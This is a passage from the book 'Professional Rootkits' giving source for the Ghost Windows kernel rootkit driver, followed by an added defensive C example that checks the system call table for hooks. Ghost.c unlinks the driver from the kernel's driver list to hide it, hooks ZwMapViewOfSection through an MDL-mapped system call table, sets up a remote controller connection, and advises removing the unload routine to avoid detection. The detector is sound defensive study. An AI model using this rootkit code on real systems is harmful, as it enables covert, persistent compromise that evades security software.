Professional Rootkits (Programmer to Programmer)
The functionality required to hook the kernel system call table has been implemented by creating two new files and modifying two existing files. Remember that every file presented in this and the following chapters can be downloaded from the Wrox/Wiley Professional Rootkits website.
The new files are as follows:
hookManager.c
hookManager.h
Following are the modified files:
Ghost.c
SOURCES
The code is shown in the following section.
SOURCES
The file hookManager.c has been added to SOURCES:
```
TARGETNAME=comint32
TARGETPATH=OBJ
TARGETTYPE=DRIVER
SOURCES=Ghost.c\
        fileManager.c\
        hookManager.c\
        configManager.c
```
Ghost.c
Three new global variables have been added to Ghost.c: NewSystemCallTable, pMyMDL, and OldZwMapViewOfSection. Once again, NewSystemCallTable and pMyMDL are used to circumvent the possibility of memory protection on the system call table, and OldZwMapViewOfSection holds the address of the original ZwMapViewOfSection. It should be noted that the address saved in OldZwMapViewOfSection might not be the one placed in the system call table during system boot; it may already belong to another rootkit or to security software that hooked the call earlier.
The DriverUnload function has been modified to unhook ZwMapViewOfSection and release the MDL (unmap the locked pages and free it). Again, DriverUnload might not be required in a production environment, but it can be very useful in a development environment.
The only other addition to Ghost.c is the call to Hook. Hook is declared in hookManager.h and implemented in hookManager.c. For simplicity, the more complicated header file will be listed after the implementation file:
```c
// Ghost
// Copyright Ric Vieler, 2006

#include "ntddk.h"
#include "Ghost.h"
#include "fileManager.h"
#include "configManager.h"
#include "hookManager.h"

// Used to circumvent memory protected System Call Table
PVOID* NewSystemCallTable = NULL;
PMDL pMyMDL = NULL;

// Pointer(s) to original function(s)
ZWMAPVIEWOFSECTION OldZwMapViewOfSection;

// Global version data
ULONG majorVersion;
ULONG minorVersion;

// Comment out in free build to avoid detection
VOID OnUnload( IN PDRIVER_OBJECT pDriverObject )
{
    DbgPrint("comint32: OnUnload called.");

    // Unhook any hooked functions and return the Memory Descriptor List
    if( NewSystemCallTable )
    {
        UNHOOK( ZwMapViewOfSection, OldZwMapViewOfSection );
        MmUnmapLockedPages( NewSystemCallTable, pMyMDL );
        IoFreeMdl( pMyMDL );
    }
}

NTSTATUS DriverEntry( IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING theRegistryPath )
{
    DRIVER_DATA* driverData;

    // Get the operating system version
    PsGetVersion( &majorVersion, &minorVersion, NULL, NULL );

    // Major = 4: Windows NT 4.0, Windows Me, Windows 98 or Windows 95
    // Major = 5: Windows Server 2003, Windows XP or Windows 2000
    // Minor = 0: Windows 2000, Windows NT 4.0 or Windows 95
    // Minor = 1: Windows XP
    // Minor = 2: Windows Server 2003
    if ( majorVersion == 5 && minorVersion == 2 )
    {
        DbgPrint("comint32: Running on Windows 2003");
    }
    else if ( majorVersion == 5 && minorVersion == 1 )
    {
        DbgPrint("comint32: Running on Windows XP");
    }
    else if ( majorVersion == 5 && minorVersion == 0 )
    {
        DbgPrint("comint32: Running on Windows 2000");
    }
    else if ( majorVersion == 4 && minorVersion == 0 )
    {
        DbgPrint("comint32: Running on Windows NT 4.0");
    }
    else
    {
        DbgPrint("comint32: Running on unknown system");
    }

    // Hide this driver
    driverData = *((DRIVER_DATA**)((DWORD)pDriverObject + 20));
    if( driverData != NULL )
    {
        // unlink this driver entry from the driver list
        *((PDWORD)driverData->listEntry.Blink) = (DWORD)driverData->listEntry.Flink;
        driverData->listEntry.Flink->Blink = driverData->listEntry.Blink;
    }

    // Comment out in free build to avoid detection
    pDriverObject->DriverUnload = OnUnload;

    // Configure the controller connection
    if( !NT_SUCCESS( Configure() ) )
    {
        DbgPrint("comint32: Could not configure remote connection.\n");
        return STATUS_UNSUCCESSFUL;
    }

    // Hook the System Call Table
    if( !NT_SUCCESS( Hook() ) )
    {
        DbgPrint("comint32: Could not hook the System Call Table.\n");
        return STATUS_UNSUCCESSFUL;
    }

    return STATUS_SUCCESS;
}
```
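The hook installed above replaces a system call table entry with a pointer into the driver's own image, and the text notes that the saved "original" pointer may itself belong to an earlier hook by another rootkit or by security software. A defender-side integrity check therefore should not trust any saved value; instead it compares each table entry against the address range of the kernel image that legitimately services the table. The C program below is an added example and is not code from the book or from the Ghost driver. It runs in user mode over a constructed table and a constructed kernel image range; the type names, function names and sample addresses are assumptions made for illustration, and on a real system the range would come from the loaded-module list.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Address range of a loaded image. On a real system this comes from the
   loaded-module list; the values below are constructed for the example. */
typedef struct {
    uintptr_t base;
    size_t    size;
} image_range_t;

static int in_image(const image_range_t *img, uintptr_t p)
{
    return p >= img->base && p < img->base + img->size;
}

/* Scan a system call table (function pointers stored as integers) and
   report every entry that points outside the expected image. Returns the
   total number of such entries; up to max_out of their indices are written
   to out_idx so the caller can name the suspicious service numbers. */
size_t find_out_of_image_entries(const uintptr_t *table, size_t n,
                                 const image_range_t *img,
                                 size_t *out_idx, size_t max_out)
{
    size_t found = 0;
    for (size_t i = 0; i < n; i++) {
        if (!in_image(img, table[i])) {
            if (found < max_out)
                out_idx[found] = i;
            found++;
        }
    }
    return found;
}

/* Constructed sample data: a 2 MB "kernel" image and a six-entry table in
   which entry 4 has been redirected to an address outside that image. */
static const image_range_t SAMPLE_KERNEL = { 0x80400000u, 0x00200000u };
static const uintptr_t SAMPLE_TABLE[] = {
    0x80401000u, 0x80402a10u, 0x80411f00u, 0x80420040u,
    0xf8a12340u,   /* constructed: lies outside the kernel image */
    0x80433c80u,
};
#define SAMPLE_COUNT (sizeof SAMPLE_TABLE / sizeof SAMPLE_TABLE[0])

/* Helpers that run the check over the sample so results can be verified. */
size_t sample_hook_count(void)
{
    size_t idx[SAMPLE_COUNT];
    return find_out_of_image_entries(SAMPLE_TABLE, SAMPLE_COUNT,
                                     &SAMPLE_KERNEL, idx, SAMPLE_COUNT);
}

size_t sample_first_hooked_index(void)
{
    size_t idx[SAMPLE_COUNT];
    size_t n = find_out_of_image_entries(SAMPLE_TABLE, SAMPLE_COUNT,
                                         &SAMPLE_KERNEL, idx, SAMPLE_COUNT);
    return n ? idx[0] : (size_t)-1;
}

int main(void)
{
    size_t idx[SAMPLE_COUNT];
    size_t n = find_out_of_image_entries(SAMPLE_TABLE, SAMPLE_COUNT,
                                         &SAMPLE_KERNEL, idx, SAMPLE_COUNT);
    printf("%zu entries point outside the kernel image\n", n);
    for (size_t i = 0; i < n; i++)
        printf("  service %zu -> %#lx\n", idx[i],
               (unsigned long)SAMPLE_TABLE[idx[i]]);
    return 0;
}
```

The check deliberately ignores whatever "original" pointer a hooking driver may have saved, because that value can already be a hook. Two caveats for real use: the main table is serviced by ntoskrnl, while the shadow table used for GUI services also contains legitimate pointers into win32k.sys, so each table needs its own set of allowed images; and legitimate security products that hook the table will show up as findings, so an entry outside the image is a lead to attribute to a module, not a verdict on its own.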